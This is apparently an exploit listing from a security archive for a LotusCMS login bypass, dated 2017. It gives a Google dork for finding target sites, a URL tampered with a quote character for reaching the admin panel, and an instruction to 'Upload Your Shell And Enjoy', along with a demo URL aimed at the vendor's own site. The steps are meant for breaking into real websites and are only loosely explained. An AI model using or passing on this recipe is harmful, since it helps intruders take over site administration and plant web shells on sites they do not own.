LotusCMS Bypass Login Vulnerability

Published
Credit
Risk
2017.02.22
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:Proudly Powered by: LotusCMS

|=============================================================|
|
|-------------------In The Name Of God------------------------|
|
| Exploit Title : LotusCMS Bypass Login Vulnerability
|
| Exploit Author : Ashiyane Digital Security Team
|
| Google Dork : intext:Proudly Powered by: LotusCMS
| Tested on : Kali linux
|
| Date : 2/17/2017
|
| Vendor HomePage : http://www.lotuscms.org
|
|======================================|
|
| Tutorial :
|
| Search The Dork Or Go To Vendor HomePage And Select Your Target
| Then Go To Admin Panel At : /index.php?system=Admin&page=loginSubmit
| Paste The Target With ' Character : Target'
| At Last Change Url To : site/admin/index.php?system=Admin&page=loginSubmit
| Upload Your Shell And Enjoy !
| Demo:
| http://www.lotuscms.org/index.php?system=Admin&page=loginSubmit'
|=============================================================|
| Discovered By : Terminator Special Tnx 2 : My PC
|=============================================================|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com